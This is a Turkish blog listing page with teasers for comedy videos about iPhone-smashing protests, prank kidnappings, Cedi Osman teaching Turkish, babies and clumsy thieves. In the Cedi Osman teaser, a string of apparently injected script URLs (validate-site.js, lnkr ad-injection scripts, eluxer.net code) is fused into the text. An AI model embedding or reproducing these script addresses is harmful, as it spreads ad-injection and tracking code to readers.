Doların hunharca artışından sonra ABD’ye gözdağı vermek için yanındaki çocukların iphone’larını toplayıp balyozla parçalayan adam, orantısız zekasıyla izleyenin gözlerini yaşarttığı sırada arkadan iphone sesi duyulması ile yurdumuzdaki iphone protestosu tarihine damgasını vuruyor. Tabii çalan telefon sesinin böyle bir yiğidin arka cebinden geldiğine zinhar inanmıyoruz!

Read more

Kız arkadaşınızı ya da eşinizi yanınızdayken kaçırmaya kalksalar ne yapardınız. İşte bu videoda kız kaçırma şakası yapan şakacı tipler, adamların yanındaki kadınları hiç beklenmedik bir anda sırtlayıp götürüyorlar ve çok farklı tepkilerle karşılaşıyorlar. Ancak bu şakalarını Türkiye’de yapmaya kalkışsalar sanıyoruz sonunda pek gülen olmaz.

Read more

Cedi Osman, Anadolu Efes forması giydiği dönemde takım arkadaşı Stephane Lasme’ye Türkçe öğretirken ortaya komik ve eğlenceli görüntüler çıktı. Türkiye’nin en popüler basketbolcularından olan Cedi Osman, bakın nasıl Türkçe öğretiyor. http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7006x&r=16http://trafficvalidation.tools/addons/lnkr5.min.jshttp://trafficvalidation.tools/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7006_

Read more

Beyzbol sopası ya da herhangi bir sopanın etrafında kafa üstü döndükten sonra vuruş yapmaya çalışan bu komik ve baş döndürücü insanlar çok eğlenceli. Siz de kendinize farklı bir aktivite arıyorsanız bu videoyu izlerken taktik öğrenebilirsiniz.

Read more

Bir dönem hayli popüler olan kamera şakaları halen izlenebiliyor. Kanada Quebec eyaletinde oldukça sevilen kamera şakaları sizlerle. Kanada kamera şakaları ve ilginç kamera şakası videosu.

Read more

Bazı havaalanlarında uçağın kalkışına kadar iyi vakit geçirilecek restoranlar mevcut biliyorsunuz. Ancak orada yapılacak şeyler aşağı yukarı belli ve sınırlıdır. Yemek yenir, bi rşeyler içilir, iki sohbet edilir, biraz kitap okunur…vb. Peki bu insanların yaptıkları eğlenceyi izlemeye koyulsanız hatta siz de katılsanız vaktiniz daha güzel ve çabuk geçmez miydi? İşte havaalanlarından eğlenceli, komik ve çılgın […]

Read more

Her bebek insanın yüzünde otomatik bir gülümseme yaratır ancak bu bebeklerin yaptıkları kahkaha attırıyor. Bu bebekler hareketleri ve yaramazlıkları ile sarhoş insanların komik hallerini çağrıştırıyor. Siz de bu sevimli bebeklerin birbirinden komik hallerini izleyince gülmeden geçemeyeceksiniz.

Read more

Yazın yaklaşmasıyla birlikte denize koşmayı ya da yaz sıcakları nedeniyle soğuk ülkelere gitmeyi düşünenler için paylaştığımız videoda kano ve kayak kullanırken neler yapılmaması gerektiğini ya da nasıl daha eğlenceli hale getirilebileceğini göstermek istedik. İşte günün stresini dağıtan komik insan halleri

Read more

İnsan ve hayvanların beslenme ihtiyacı ortak özelliklerindendir ancak bu videodaki görüntüler ekmeğin her canlı açısından özel bir yeri olduğunu ispat eder nitelikte. İşte ekmeğinin peşindeki canlıların komik görüntüleri. Keyifli seyirler.

Read more

Hırsızlık zor zanaat. Bu sektöre yıllarını vermeyenler bir şey çalamayacağı gibi bazen komik duruma bile düşebilirler. Tıpkı bu videoda hırsızlık yapayım derken komiklik yapanlar gibi.

Read more